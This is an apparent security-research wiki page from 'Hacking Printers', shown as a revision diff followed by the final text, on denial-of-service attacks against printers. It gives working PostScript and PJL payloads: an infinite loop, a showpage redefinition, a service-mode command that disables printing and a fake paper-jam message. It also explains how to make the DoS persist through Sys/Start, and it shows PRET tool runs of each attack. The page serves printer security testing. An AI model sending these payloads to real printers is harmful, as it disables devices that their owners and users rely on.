Difference between revisions of "Document processing"

From Hacking Printers
Jump to: navigation, search
 
(2 intermediate revisions by one other user not shown)
Line 1: Line 1:
Page description languages allowing infinite loops or calculations that require a lot of computing time can be abused to keep the printer's [https://en.wikipedia.org/wiki/Raster_image_processor RIP] busy. Examples of this are complex [https://en.wikipedia.org/wiki/HPGL HP-GL] calculations and [[PostScript]] programs. Even minimalist languages like [[PCL]], can be used to upload permanent marcos or fonts, until the available memory is consumed. [[PJL]] on HP devices has undocumented features to completely disable further printing functionality. In this article, various practical approaches of malicious print jobs which lead to denial of service are discussed.
+
Page description languages allowing infinite loops or calculations that require a lot of computing time can be abused to keep the printer's [https://en.wikipedia.org/wiki/Raster_image_processor RIP] busy. Examples of this are complex [https://en.wikipedia.org/wiki/HPGL HP-GL] calculations and [[PostScript]] programs. Even minimalist languages like [[PCL]] can be used to upload permanent macros or fonts until the available memory is consumed. [[PJL]] on HP devices has undocumented features to completely disable further printing functionality. In this article, various practical approaches of malicious print jobs which lead to denial of service are discussed.
  
 
== PostScript ==
 
== PostScript ==
Line 12: Line 12:
 
</syntaxhighlight>
 
</syntaxhighlight>
  
This minimalist document keeps a PostScript interpreter busy forever. In an evalation with a pool of 20 test printers, only one had a watchdog mechanism and restarted itself after about 10 minutes. The other devices did not accept print jobs anymore until the test was ultimately interrupted after half an hour. The malicious print job could in most cases manually be canceled from the control panel while some devices required a manual restart. In contrast to blocking the [[transmission channel]], the connection can be closed immediately after the PostScript code has been sent.
+
This minimalist document keeps a PostScript interpreter busy forever. In an evaluation with a pool of 20 test printers, only one had a watchdog mechanism and restarted itself after about 10 minutes. The other devices did not accept print jobs anymore until the test was ultimately interrupted after half an hour. The malicious print job could in most cases manually be canceled from the control panel, while some devices required a manual restart. In contrast to blocking the [[transmission channel]], the connection can be closed immediately after the PostScript code has been sent. Another variant of this attack is to write the code into ''Sys/Start'' or similar files which are executed at interpreter startup and even '''survive a reboot''' on devices with a [[File system access|writable disk]].
  
 
'''How to test for this attack?'''
 
'''How to test for this attack?'''
Line 39: Line 39:
 
/showpage {} def
 
/showpage {} def
 
</syntaxhighlight>
 
</syntaxhighlight>
 +
 +
Again, this code can also be written into ''Sys/Start'', ''startup.ps'' or similar files to cause '''permanent DoS''' on devices with a [[File system access|writable disk]].
  
 
'''How to test for this attack?'''
 
'''How to test for this attack?'''

Latest revision as of 17:43, 8 February 2017

Page description languages allowing infinite loops or calculations that require a lot of computing time can be abused to keep the printer's RIP busy. Examples of this are complex HP-GL calculations and PostScript programs. Even minimalist languages like PCL can be used to upload permanent macros or fonts until the available memory is consumed. PJL on HP devices has undocumented features to completely disable further printing functionality. In this article, various practical approaches of malicious print jobs which lead to denial of service are discussed.

PostScript

Infinite loops

One trivial example of an infinite loop written in PostScript is given below:

%!
{} loop

This minimalist document keeps a PostScript interpreter busy forever. In an evaluation with a pool of 20 test printers, only one had a watchdog mechanism and restarted itself after about 10 minutes. The other devices did not accept print jobs anymore until the test was ultimately interrupted after half an hour. The malicious print job could in most cases manually be canceled from the control panel, while some devices required a manual restart. In contrast to blocking the transmission channel, the connection can be closed immediately after the PostScript code has been sent. Another variant of this attack is to write the code into Sys/Start or similar files which are executed at interpreter startup and even survive a reboot on devices with a writable disk.

How to test for this attack?

Use PRET's hang command in ps mode:

./pret.py -q printer ps
Connection to printer established

Welcome to the pret shell. Type help or ? to list commands.
printer:/> hang
Warning: This command causes an infinite loop rendering the
device useless until manual restart. Press CTRL+C to abort.
Executing PostScript infinite loop in... 10 9 8 7 6 5 4 3 2 1 KABOOM!

Who can perform this attack?

Anyone who can print, for example through USB drive or cable, Port 9100 printing or Cross-site printing.

Redefine showpage

Another approach is to permanently redefine PostScript operators as described in security features. By setting showpage – which is used in every document to actually print the page – to do nothing at all, PostScript jobs are processed but not put to paper anymore. Example code is given below:

true 0 startjob
/showpage {} def

Again, this code can also be written into Sys/Start, startup.ps or similar files to cause permanent DoS on devices with a writable disk.

How to test for this attack?

Use PRET's disable command in ps mode:

./pret.py -q printer ps
Connection to printer established

Welcome to the pret shell. Type help or ? to list commands.
printer:/> disable
Disabling printing functionality

Who can perform this attack?

Anyone who can print, for example through USB drive or cable, Port 9100 printing or Cross-site printing.

PJL

PJL jobmedia

Proprietary PJL commands [1] can be used to set the older HP devices like the LaserJet 4k series into service mode and completely disable all printing functionality as shown below:

@PJL SET SERVICEMODE=HPBOISEID
@PJL DEFAULT JOBMEDIA=OFF

How to test for this attack?

Use PRET's disable command in pjl mode:

./pret.py -q printer pjl
Connection to printer established

Welcome to the pret shell. Type help or ? to list commands.
printer:/> disable
Printing functionality: OFF

Who can perform this attack?

Anyone who can print, for example through USB drive or cable, Port 9100 printing or Cross-site printing.

Offline mode

In addition, the PJL standard defines the OPMSG command which ‘prompts the printer to display a specified message and go offline’ \cite{hp1997pjl}. This can be used to simulate a paper jam as shown in below:

@PJL OPMSG DISPLAY="PAPER JAM IN ALL DOORS"

The command is supported by various printer models of different manufacturers. The device can however be easily brought to accept jobs again by manually pressing the online button on the control panel.

How to test for this attack?

Use PRET's offline command in pjl mode:

./pret.py -q printer pjl
Connection to printer established

Welcome to the pret shell. Type help or ? to list commands.
printer:/> offline "MESSAGE TO DSIPLAY"
Warning: Taking the printer offline will prevent yourself and others
from printing or re-connecting to the device. Press CTRL+C to abort.
Taking printer offline in... 10 9 8 7 6 5 4 3 2 1 KABOOM!

Who can perform this attack?

Anyone who can print, for example through USB drive or cable, Port 9100 printing or Cross-site printing.



  1. The German Laserweb Vers. 4.0: Test without Paper, ATS/GCC Team Germany